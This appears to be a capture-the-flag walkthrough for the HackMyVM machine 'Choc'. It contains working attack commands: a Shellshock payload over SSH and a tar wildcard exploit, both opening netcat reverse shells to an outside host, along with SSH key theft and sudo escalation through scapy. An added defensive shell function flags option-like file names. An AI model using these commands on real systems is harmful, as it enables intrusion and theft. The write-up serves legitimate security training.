https://hackmyvm.eu/machines/machine.php?vm=Choc
Scan all ports with Nmap; only 21 and 22 are open.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Log in to FTP as anonymous and get id_rsa.
Try SSH and get the user name "carl".
Try to log in over SSH as "carl" with the id_rsa; the VM displays a message and quits.
Try the bash Shellshock exploit through SSH. Listen on port 1234 in one terminal, and log in over SSH in another terminal.
ssh carl@192.168.56.100 -i id_rsa '() { :;}; nc 192.168.56.150 1234 -e /bin/bash'
Use Python's pty module to get an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
There are 3 users in the home folder.
In torki's home, find secret_garden/diary.txt.
There is a backup.sh file, which we cannot read now.
Search for files belonging to user torki; this finds /tmp/backup_home.tgz.
find / -user torki 2>/dev/null
Use tar -xvf to extract it; it contains diary.txt.
Now we can use the tar wildcard exploit.
Listen on port 2234 in one terminal, and create 3 files in /home/torki/secret_garden.
Wait 1 minute, and we will get a reverse shell.
echo '' > secret_garden/--checkpoint=1
echo '' > 'secret_garden/--checkpoint-action=exec=sh pwn.sh'
echo 'nc 192.168.56.150 2234 -e /bin/bash' > secret_garden/pwn.sh
chmod +x secret_garden/pwn.sh
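A defensive view of the step above, as an added example that is not part of the original write-up. Since backup.sh could not be read, it is assumed here that the scheduled job runs tar over a bare * inside secret_garden. The function names find_option_like_names and safe_backup are hypothetical: the first reports file names that tar would parse as options, the second archives the directory by name so that no file name ever reaches tar's command line.

```shell
# Added example, not the VM's backup.sh (its contents are unknown).
# Assumption: the scheduled job does `cd <dir> && tar -czf <archive> *`,
# so the shell turns every file name into a tar argument.

# Print each entry in a directory whose name starts with "-".
# With a bare `*`, tar treats such names as options, not as files.
find_option_like_names() {
    dir=$1
    for f in "$dir"/*; do
        # Skip the unexpanded pattern when the directory is empty.
        [ -e "$f" ] || [ -L "$f" ] || continue
        name=${f##*/}
        case $name in
            -*) printf '%s\n' "$name" ;;
        esac
    done
    return 0
}

# Archive a directory without shell globbing. tar reads the entries
# itself via `-C <dir> .`, so a file called "--checkpoint-action=..."
# is stored as an ordinary member and is never interpreted.
# Option-like names are still logged to stderr as a detection signal.
safe_backup() {
    src=$1
    out=$2
    suspicious=$(find_option_like_names "$src")
    if [ -n "$suspicious" ]; then
        printf 'warning: option-like file names in %s:\n%s\n' \
            "$src" "$suspicious" >&2
    fi
    tar -czf "$out" -C "$src" .
}
```

Keeping the archive outside the source directory, as /tmp/backup_home.tgz already is, avoids tar trying to include its own output.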
In /home/torki/.ssh, get id_rsa; now we can log in over SSH as torki.
Check sudo -l; we can escalate to user sarah.
Run sudo -u sarah /usr/bin/scapy; in scapy's interactive mode, run 'import pty;pty.spawn("/bin/bash")'.
Check sudo -l again.
Now we can get /root/.ssh/id_rsa.
And get root finally.